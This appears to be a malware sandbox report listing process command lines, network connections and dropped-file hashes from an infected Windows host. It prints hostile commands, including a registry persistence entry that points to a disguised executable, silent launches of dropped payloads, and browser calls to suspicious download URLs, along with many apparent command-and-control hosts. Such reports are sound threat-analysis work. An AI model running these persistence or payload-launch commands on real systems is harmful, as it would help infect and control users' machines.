C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 744 -p 6344 -ip 6344
C:\Users\Admin\AppData\Local\Temp\d4-001ce-5c9-a609d-d7e0c01cc2615\Typokyniki.exe
"C:\Users\Admin\AppData\Local\Temp\d4-001ce-5c9-a609d-d7e0c01cc2615\Typokyniki.exe"
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6344 -s 880
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 800 -p 6804 -ip 6804
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6804 -s 2412
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
C:\Windows\SysWOW64\reg.exe
reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c start http://afleof21klg.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^¶m=721
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\is-QP076.tmp\{app}\vdi_compiler.exe
"C:\Users\Admin\AppData\Local\Temp\is-QP076.tmp\{app}\vdi_compiler"
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe
"C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 832 -p 3608 -ip 3608
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3608 -s 280
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://afleof21klg.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq&cid=74449¶m=721
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa42de46f8,0x7ffa42de4708,0x7ffa42de4718
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe install OemVista.inf tap0901
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2200,5294761100101210974,4511905744690180043,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2212 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2200,5294761100101210974,4511905744690180043,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2200,5294761100101210974,4511905744690180043,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2664 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,5294761100101210974,4511905744690180043,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3148 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,5294761100101210974,4511905744690180043,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3160 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{0e59043d-6bd7-3d48-a220-b17f423f415e}\oemvista.inf" "9" "4d14a44ff" "0000000000000150" "WinSta0\Default" "0000000000000168" "208" "c:\program files (x86)\maskvpn\driver\win764"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,5294761100101210974,4511905744690180043,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4764 /prefetch:1
C:\Windows\system32\DrvInst.exe
DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oem2.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000150" "41aa"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x10c,0x110,0x114,0xdc,0x118,0x7ffa42de46f8,0x7ffa42de4708,0x7ffa42de4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,5294761100101210974,4511905744690180043,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4480 /prefetch:1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\afuzpqgt.zof\GcleanerEU.exe /eufive & exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4gh4cvlz.mcc\LivelyScreenReLou1.9.exe & exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\21400odt.mik\installer.exe /qn CAMPAIGN="654" & exit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\afuzpqgt.zof\GcleanerEU.exe
C:\Users\Admin\AppData\Local\Temp\afuzpqgt.zof\GcleanerEU.exe /eufive
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0f0trtmx.rnh\ebook.exe & exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0soyi010.4av\ufgaa.exe & exit
C:\Users\Admin\AppData\Local\Temp\21400odt.mik\installer.exe
C:\Users\Admin\AppData\Local\Temp\21400odt.mik\installer.exe /qn CAMPAIGN="654"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,5294761100101210974,4511905744690180043,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5472 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\4gh4cvlz.mcc\LivelyScreenReLou1.9.exe
C:\Users\Admin\AppData\Local\Temp\4gh4cvlz.mcc\LivelyScreenReLou1.9.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 780 -p 6884 -ip 6884
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6884 -s 276
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\03gmj4hl.j0e\anyname.exe & exit
Network
| Country | Destination | Domain | Proto |
| N/A | 51.124.78.146:443 | tcp | |
| N/A | 20.190.159.134:443 | tcp | |
| N/A | 51.124.78.146:443 | settings-win.data.microsoft.com | tcp |
| N/A | 40.125.122.176:443 | slscr.update.microsoft.com | tcp |
| N/A | 52.152.108.96:443 | fe3cr.delivery.mp.microsoft.com | tcp |
| N/A | 40.125.122.176:443 | slscr.update.microsoft.com | tcp |
| N/A | 37.0.8.235:80 | tcp | |
| N/A | 40.125.122.176:443 | slscr.update.microsoft.com | tcp |
| N/A | 51.124.78.146:443 | settings-win.data.microsoft.com | tcp |
| N/A | 40.125.122.176:443 | slscr.update.microsoft.com | tcp |
| N/A | 20.54.110.119:443 | tsfe.trafficshaping.dsp.mp.microsoft.com | tcp |
| N/A | 37.0.11.8:80 | tcp | |
| N/A | 20.189.118.208:80 | tcp | |
| N/A | 172.67.133.215:80 | wfsdragon.ru | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 8.8.8.8:53 | i.spesgrt.com | udp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 8.8.8.8:53 | privacytoolz123foryou.xyz | udp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 172.67.153.179:80 | i.spesgrt.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 185.183.96.3:80 | privacytoolz123foryou.xyz | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:80 | cdn.discordapp.com | tcp |
| N/A | 52.219.62.11:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 104.21.49.131:80 | a.goatagame.com | tcp |
| N/A | 104.21.49.131:80 | a.goatagame.com | tcp |
| N/A | 111.90.156.58:80 | fsstoragecloudservice.com | tcp |
| N/A | 88.99.66.31:80 | 2no.co | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 88.99.66.31:80 | 2no.co | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 104.21.49.131:443 | a.goatagame.com | tcp |
| N/A | 111.90.156.58:443 | fsstoragecloudservice.com | tcp |
| N/A | 88.99.66.31:443 | 2no.co | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 95.181.163.101:80 | hockeybruinsteamshop.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 52.219.62.11:443 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 104.21.9.227:443 | bb.goatggame.com | tcp |
| N/A | 185.233.185.134:80 | alebastersbastard.com | tcp |
| N/A | 192.210.222.84:80 | 192.210.222.84 | tcp |
| N/A | 104.21.17.130:443 | s.lletlee.com | tcp |
| N/A | 72.21.81.240:80 | tcp | |
| N/A | 104.21.17.130:443 | s.lletlee.com | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 45.136.151.102:80 | staticimg.youtuuee.com | tcp |
| N/A | 152.32.151.93:80 | 152.32.151.93 | tcp |
| N/A | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 208.95.112.1:80 | ip-api.com | tcp |
| N/A | 104.26.8.187:80 | proxycheck.io | tcp |
| N/A | 88.99.66.31:443 | 2no.co | tcp |
| N/A | 37.0.10.237:80 | 37.0.10.237 | tcp |
| N/A | 172.67.128.192:443 | one-wedding-film.xyz | tcp |
| N/A | 52.219.66.15:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 88.99.66.31:443 | 2no.co | tcp |
| N/A | 52.219.66.15:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 185.206.215.216:80 | tcp | |
| N/A | 157.240.220.35:443 | www.facebook.com | tcp |
| N/A | 185.186.142.245:22850 | tcp | |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 188.124.36.242:25802 | tcp | |
| N/A | 88.99.66.31:443 | 2no.co | tcp |
| N/A | 88.99.66.31:443 | 2no.co | tcp |
| N/A | 193.56.146.22:26336 | tcp | |
| N/A | 188.124.36.242:25802 | tcp | |
| N/A | 45.14.49.128:5385 | tcp | |
| N/A | 37.0.8.88:44263 | tcp | |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 104.21.1.123:443 | money4systems4.xyz | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 172.67.205.30:443 | download-serv-234116.xyz | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 52.219.62.60:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 95.213.224.6:80 | readinglistforaugust2.xyz | tcp |
| N/A | 52.219.62.60:80 | 7e10a716-f462-4371-a152-105d67ce51a8.s3.ap-south-1.amazonaws.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 37.0.10.214:80 | 37.0.10.214 | tcp |
| N/A | 37.0.10.237:80 | tcp | |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 34.117.59.81:80 | ipinfo.io | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 34.117.59.81:443 | ipinfo.io | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 66.29.142.79:80 | the-flash-man.com | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 104.26.2.60:443 | ipqualityscore.com | tcp |
| N/A | 104.26.2.60:443 | ipqualityscore.com | tcp |
| N/A | 104.26.2.60:443 | ipqualityscore.com | tcp |
| N/A | 172.67.128.192:443 | one-wedding-film.xyz | tcp |
| N/A | 8.8.8.8:53 | ingstorage.com | udp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 5.182.39.145:80 | ingstorage.com | tcp |
| N/A | 95.142.37.102:80 | activityhike.com | tcp |
| N/A | 176.9.93.201:80 | s3.tebi.io | tcp |
| N/A | 52.222.137.163:80 | duzlwewk2uk96.cloudfront.net | tcp |
| N/A | 5.182.39.145:80 | ingstorage.com | tcp |
| N/A | 95.142.37.102:443 | activityhike.com | tcp |
| N/A | 176.9.93.201:80 | s3.tebi.io | tcp |
| N/A | 52.222.137.163:80 | duzlwewk2uk96.cloudfront.net | tcp |
| N/A | 45.87.3.183:2705 | tcp | |
| N/A | 88.99.66.31:443 | 2no.co | tcp |
| N/A | 45.136.151.102:80 | uyg5wye.2ihsfa.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 172.67.178.16:443 | bestinternetstore.xyz | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 45.136.151.102:80 | uyg5wye.2ihsfa.com | tcp |
| N/A | 88.99.66.31:443 | 2no.co | tcp |
| N/A | 142.250.179.193:443 | script.googleusercontent.com | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 172.217.17.78:443 | script.google.com | tcp |
| N/A | 172.67.205.30:443 | download-serv-234116.xyz | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 188.124.36.242:25802 | tcp | |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 172.67.216.236:80 | swretjhwrtj.gq | tcp |
| N/A | 162.0.210.44:443 | connectini.net | tcp |
| N/A | 185.230.143.48:14462 | tcp | |
| N/A | 94.103.83.88:65136 | tcp | |
| N/A | 54.208.186.182:443 | paybiz.herokuapp.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 193.164.17.17:80 | heso-vpn.ug | tcp |
| N/A | 193.164.17.17:80 | heso-vpn.ug | tcp |
| N/A | 185.49.70.90:2080 | 185.49.70.90 | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 66.29.142.79:80 | the-flash-man.com | tcp |
| N/A | 135.181.123.52:12073 | tcp | |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 162.0.220.187:80 | requestimmersive.com | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 185.4.65.191:1203 | twelveoclock.top | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 195.171.92.116:80 | geo.netsupportsoftware.com | tcp |
| N/A | 162.159.130.233:443 | cdn.discordapp.com | tcp |
| N/A | 104.16.203.237:443 | www.mediafire.com | tcp |
| N/A | 95.181.152.223:52383 | tcp | |
| N/A | 172.217.19.196:80 | www.google.com | tcp |
| N/A | 199.91.155.72:443 | download2331.mediafire.com | tcp |
| N/A | 162.0.210.44:443 | connectini.net | tcp |
| N/A | 162.0.210.44:443 | connectini.net | tcp |
| N/A | 212.224.105.106:80 | deyrolorme.xyz | tcp |
| N/A | 194.87.138.150:80 | afleof21klg.top | tcp |
| N/A | 194.87.138.150:80 | afleof21klg.top | tcp |
| N/A | 131.253.33.200:443 | www.bing.com | tcp |
| N/A | 23.97.153.169:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 23.97.153.169:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 8.8.8.8:443 | dns.google | tcp |
| N/A | 162.0.220.187:80 | requestimmersive.com | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| N/A | 194.145.227.159:80 | 194.145.227.159 | tcp |
| N/A | 172.67.195.31:443 | web-development-networks.com | tcp |
| N/A | 52.178.182.73:443 | smartscreen-prod.microsoft.com | tcp |
| N/A | 162.0.220.187:80 | requestimmersive.com | tcp |
| N/A | 8.8.8.8:53 | dns.google | udp |
| N/A | 8.8.8.8:53 | dns.google | udp |
| N/A | 88.99.66.31:443 | yip.su | tcp |
| N/A | 212.224.105.79:80 | readinglistforaugust3.xyz | tcp |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 8.8.8.8:443 | dns.google | udp |
| N/A | 192.243.59.20:443 | www.profitabletrustednetwork.com | tcp |
| N/A | 192.243.59.20:443 | www.profitabletrustednetwork.com | tcp |
| N/A | 104.21.33.188:443 | source3.boys4dayz.com | tcp |
| N/A | 88.99.66.31:443 | yip.su | tcp |
| N/A | 185.233.185.134:80 | alebastersbastard.com | tcp |
| N/A | 52.45.132.150:443 | tcp | |
| N/A | 192.210.222.84:80 | 192.210.222.84 | tcp |
| N/A | 52.164.226.245:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 104.21.29.4:80 | cache.uutww77.com | tcp |
| N/A | 52.164.226.245:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 212.32.249.110:443 | tcp | |
| N/A | 3.229.58.197:443 | tcp | |
| N/A | 88.99.66.31:443 | yip.su | tcp |
| N/A | 52.178.182.73:443 | smartscreen-prod.microsoft.com | tcp |
| N/A | 52.164.226.245:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 45.91.67.130:80 | ferstappen.com | tcp |
| N/A | 52.164.226.245:443 | nav.smartscreen.microsoft.com | tcp |
| N/A | 104.18.11.207:443 | tcp | |
| N/A | 104.26.6.228:443 | tcp | |
| N/A | 104.22.64.104:443 | tcp | |
| N/A | 172.67.145.110:443 | a.goatagame.com | tcp |
| N/A | 104.26.7.228:443 | tcp | |
| N/A | 104.26.7.228:443 | tcp | |
| N/A | 104.21.9.227:443 | bb.goatggame.com | tcp |
Files
C:\Users\Admin\Documents\Are.docx
| MD5 | a33e5b189842c5867f46566bdbf7a095 |
| SHA1 | e1c06359f6a76da90d19e8fd95e79c832edb3196 |
| SHA256 | 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454 |
| SHA512 | f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b |
C:\Users\Admin\Documents\Files.docx
| MD5 | 4a8fbd593a733fc669169d614021185b |
| SHA1 | 166e66575715d4c52bcb471c09bdbc5a9bb2f615 |
| SHA256 | 714cd32f8edacb3befbfc4b17db5b6eb05c2c8936e3bae14ea25a6050d88ae42 |
| SHA512 | 6b2ebbbc34cd821fd9b3d7711d9cdadd8736412227e191883e5df19068f8118b7c80248eb61cc0a2f785a4153871a6003d79de934254b2c74c33b284c507a33b |
C:\Users\Admin\Documents\Opened.docx
| MD5 | bfbc1a403197ac8cfc95638c2da2cf0e |
| SHA1 | 634658f4dd9747e87fa540f5ba47e218acfc8af2 |
| SHA256 | 272ed278e82c84cf4f80f48ec7989e1fc35f2055d6d05b63c8a31880846597a6 |
| SHA512 | b8938526fcbf7152805aec130ca553e3ec949cb825430a5d0a25c90ec5eb0863857010484a4b31fdc4bb65a4c92ad7127c812b93114be4569a677f60debe43b1 |
C:\Users\Admin\Documents\Recently.docx
| MD5 | 3b068f508d40eb8258ff0b0592ca1f9c |
| SHA1 | 59ac025c3256e9c6c86165082974fe791ff9833a |
| SHA256 | 07db44a8d6c3a512b15f1cb7262a2d7e4b63ced2130bc9228515431699191cc7 |
